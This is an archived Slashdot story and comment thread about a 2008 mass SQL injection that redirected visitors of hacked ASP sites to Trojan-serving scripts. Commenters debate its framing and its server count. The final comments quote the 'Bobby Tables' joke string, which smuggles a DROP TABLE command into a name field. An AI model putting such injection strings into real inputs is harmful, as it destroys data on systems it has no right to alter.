Slashdot Mirror

← Back to Stories (view on slashdot.org)

500 Thousand MS Web Servers Hacked

Posted by kdawson on from the scream-and-shout dept.

andrewd18 writes "According to F-Secure, over 500,000 webservers across the world, including some from the United Nations and UK government, have been victims of a SQL injection. The attack uses an SQL injection to reroute clients to a malicious javascript at nmidahena.com, aspder.com or nihaorr1.com, which use another set of exploits to install a Trojan on the client's computer. As per usual, Firefox users with NoScript should be safe from the client exploit, but server admins should be alert for the server-side injection. Brian Krebs has a decent writeup on his Washington Post Security Blog, Dynamoo has a list of some of the high-profile sites that have been hacked, and for fun you can watch some of the IIS admins run around in circles at one of the many IIS forums on the 'net."

9 of 332 comments (clear)

  1. Bias? by jmpeax · · Score: 5, Informative
    SQL injection is a result of poor data validation on the part of the web application - not, as the blurb implies, an indicator of an insecure web server. LAMP installations are also susceptible to SQL injection (PDF). From TFA:

    Unless [...] data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. As for the fact that Firefox + NoScript prevents the problems, that really isn't a surprise seeing as these specific exploits rely on executing a JScript. Any browser with scripting disabled would be immune.

    The tone of the blurb is not only biased but also counter-productive to promoting open source (as this appears to be its intention): by trying to criticise closed technologies not by highlighting their actual deficiencies but instead by spreading FUD, the whole community is done a disservice.
    --
    Amnesty International
    1. Re:Bias? by Shados · · Score: 5, Insightful

      I agree, and that was my first reaction: "Wtf does IIS have to do with SQL injection". If nothing else, a LAMP stack would be more susceptible, not because of the servers, but because PHP didn't have mainstream prepared statements as part of a default standard install in its earlier versions, and now that it DOES have it, a lot of script kiddies or peanut gallery programmers aren't using them, as opposed to Java/.NET/Whatever which, while still having some issues with the same group of newbie developers, are prepared-statement centric in their development paradigms and documentation, thus reducing the amount of possible SQL injection significantly, unless the apps are made in legacy environments too.

      Its such a rediculous flamebait, I don't know what to say.

    2. Re:Bias? by Stellian · · Score: 5, Funny

      In fact, the attack enumerates all ASP variables and tries to force a SQL payload in them, that in turn if executed adds the link to the malicious script to every textfield in the database. A very simple vulnerability scanner, if you like, targeting only ASP applications - thus the ISS spin.
      Since we don't see the LAMP version spreading I think we can safely conclude that no web application written in PHP with a MySQL back-end is currently vulnerable to any type of SQL injection.

  2. Re:epic lol by James+Kilton · · Score: 5, Informative
    Wow. The responses on the forum http://forums.iis.net/t/1148917.aspx?PageIndex=1 are sad indeed. Windows Security patches DON'T protect against shittily built websites. My favorite:

    I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwritten that script into all of your products. Luckily a database restore fixed the problem. Two days later the same thing happened, I have changed all the database and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing but this time as the pages are loaded ActivX is activated and wants to run but of course I did not allow it. Anybody has successfully solved this situation? It truely sickens me how many web developers STILL don't know about SQL Injection.
  3. Re:ob... by ArcherB · · Score: 5, Interesting

    Does it run on linux. That is actually a good question and the first thing I thought of. While I'm not worried about my little webserver being hacked as it runs on Linux without MySQL, I am worried about my browser.

    If I run Firefox on Linux without NoScript, is there a danger?

    --
    There is no "I disagree" mod for a reason. Flamebait, Troll, and Overrated are not substitutes.
  4. Re:This site makes me sick by MrMunkey · · Score: 5, Insightful

    Anyone still getting hit with this in 2008 needs to be whacked on the head. This is true of any language, not just ASP. You can easily prevent SQL injection with Perl, Python, PHP, etc.
  5. 500,000? Where'd that number come from? by Robotron2084 · · Score: 5, Informative

    Before you post such a headline, perhaps it would be a good idea to check your facts. I RTFA'ed and checked those links and there is no mention of how many servers were attacked. There were 510,000 pages mentioned, but pages do not equal servers. This a sensationalistic headline based on a sensationalistic interpretation of a Google web search.

  6. Re:ob... by steelclash84 · · Score: 5, Funny

    Did you really name your kid "Robert'); DROP TABLE Students; --"?

  7. Re:ob... by hclewk · · Score: 5, Funny

    Oh, yes. Little Bobby Tables, we call him.